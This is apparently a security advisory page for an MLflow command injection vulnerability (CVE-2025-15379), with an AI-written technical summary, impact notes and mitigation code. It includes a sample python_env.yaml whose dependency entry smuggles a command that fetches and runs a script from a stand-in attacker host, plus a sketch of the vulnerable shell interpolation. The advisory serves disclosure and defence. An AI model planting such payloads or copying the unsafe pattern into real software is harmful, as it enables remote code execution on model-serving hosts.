CVE-2025-15379: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') in mlflow mlflow/mlflow
CVE-2025-15379 is a critical command injection vulnerability in MLflow's model serving container initialization, specifically in the _install_model_dependencies_to_env() function. When deploying models with env_manager=LOCAL, MLflow unsafely interpolates dependency data from python_env.yaml into shell commands without sanitization, enabling attackers to execute arbitrary commands. This affects MLflow versions up to 3.8.0 and is fixed in 3.8.2. The vulnerability requires no authentication or user interaction and can lead to full system compromise. Organizations using MLflow for model deployment in local environments are at high risk.
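To make the attack surface concrete, a hypothetical malicious python_env.yaml of the kind the advisory describes might look like the following. The payload URL and commands are illustrative inventions, not taken from a real exploit:

```yaml
# Hypothetical malicious python_env.yaml bundled in a model artifact
python: "3.10"
build_dependencies:
  - pip
dependencies:
  - mlflow
  # Legitimate-looking entry that smuggles shell metacharacters; if the
  # dependency list is interpolated into a shell string, everything after
  # the ';' runs as its own command.
  - "numpy==1.26.0; curl http://attacker.example/x.sh | sh #"
```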
AI Analysis
Technical Summary
CVE-2025-15379 is a critical command injection vulnerability identified in MLflow, an open-source platform widely used for managing the machine learning lifecycle. The flaw resides in the _install_model_dependencies_to_env() function within MLflow's model serving container initialization code. Specifically, when a model is deployed with the environment manager set to LOCAL, MLflow reads dependency specifications from the model artifact's python_env.yaml file. These dependencies are then directly interpolated into a shell command without any sanitization or validation. This unsafe handling allows an attacker who can supply a malicious model artifact to inject arbitrary shell commands, leading to remote code execution on the host system where the model is deployed. The vulnerability affects MLflow versions up to 3.8.0 and was addressed in version 3.8.2. The CVSS v3.0 base score is 10.0 (critical): the attack vector is network-based, no privileges or user interaction are required, and confidentiality, integrity, and availability are all fully impacted. Although no in-the-wild exploitation has been observed yet, the vulnerability's nature and ease of exploitation make it a significant risk for organizations using MLflow for local model deployment.
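The vulnerable pattern described above can be illustrated with a minimal sketch. The function name and behavior below are an illustrative reconstruction of the interpolation flaw, not MLflow's actual implementation:

```python
# Illustrative reconstruction of the vulnerable pattern (not MLflow source):
# dependency entries read from python_env.yaml are joined into one shell string.
def build_install_command(dependencies):
    return "pip install " + " ".join(dependencies)

# A malicious entry smuggled into the dependencies list of python_env.yaml:
malicious = ["numpy==1.26.0; touch /tmp/pwned #"]
cmd = build_install_command(malicious)
# If this string were passed to subprocess.run(cmd, shell=True), the ';'
# would terminate the pip command and execute 'touch /tmp/pwned'
# (the trailing '#' comments out anything after the payload).
print(cmd)
```

The root cause is the combination of string interpolation and shell interpretation: any metacharacter (`;`, `|`, `$(...)`) in a dependency entry is honored by the shell rather than treated as part of a package name.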
Potential Impact
The impact of CVE-2025-15379 is severe, as it allows unauthenticated attackers to execute arbitrary commands on systems running vulnerable MLflow versions. This can lead to complete system compromise, including data theft, destruction, or manipulation, lateral movement within networks, and disruption of machine learning workflows. Organizations relying on MLflow for model deployment, especially in local environments, risk exposure of sensitive data and operational downtime. The vulnerability undermines the integrity and availability of ML models and associated infrastructure, potentially affecting business-critical AI services. Given MLflow's popularity in industries like finance, healthcare, and technology, the threat could have widespread consequences if exploited at scale.
Mitigation Recommendations
To mitigate this vulnerability, organizations should immediately upgrade MLflow to version 3.8.2 or later, where the issue is fixed. Additionally, implement strict validation and sanitization of all model artifacts before deployment, especially the python_env.yaml files, to prevent malicious content injection. Restrict model deployment permissions to trusted users and environments only. Employ containerization and sandboxing techniques to isolate model serving environments, limiting the impact of potential exploits. Monitor deployment logs for unusual command executions or anomalies. Incorporate automated security scanning of model artifacts in the CI/CD pipeline to detect malicious payloads early. Finally, maintain up-to-date backups and incident response plans tailored to ML infrastructure compromise scenarios.
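One way to implement the artifact-validation step above is to reject any dependency entry containing shell metacharacters before installation, and to invoke pip with an argument list so the shell never interprets the strings at all. The regex below is a conservative, assumed allow-list (a production deployment should use a full PEP 508 requirement parser), not MLflow's fix:

```python
import re
import subprocess

# Conservative allow-list for requirement-like strings (an assumption; use a
# real PEP 508 parser such as packaging.requirements in production).
_SAFE_DEP = re.compile(r"^[A-Za-z0-9._\-\[\],]+(==|>=|<=|~=|!=|<|>)?[A-Za-z0-9._\-\*]*$")

def validate_dependencies(dependencies):
    """Reject any entry that does not look like a plain requirement string."""
    bad = [d for d in dependencies if not _SAFE_DEP.match(d)]
    if bad:
        raise ValueError(f"Rejected suspicious dependency entries: {bad}")
    return dependencies

def safe_install(dependencies):
    deps = validate_dependencies(dependencies)
    # Argument list with no shell=True: metacharacters in deps are passed to
    # pip as literal arguments, never interpreted by a shell.
    subprocess.run(["pip", "install", *deps], check=True)
```

Passing an argument list instead of an interpolated string removes the injection primitive even if validation is bypassed, which is why the two defenses are best layered.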
Affected Countries
United States, Germany, United Kingdom, Canada, France, Japan, South Korea, Australia, India, China
Technical Details
- Data Version: 5.2
- Assigner Short Name: @huntr_ai
- Date Reserved: 2025-12-30T21:24:21.058Z
- CVSS Version: 3.0
- State: PUBLISHED
Threat ID: 69ca2868e6bfc5ba1de5eb91
Added to database: 3/30/2026, 7:38:16 AM
Last enriched: 3/30/2026, 7:53:34 AM
Last updated: 3/30/2026, 10:05:54 AM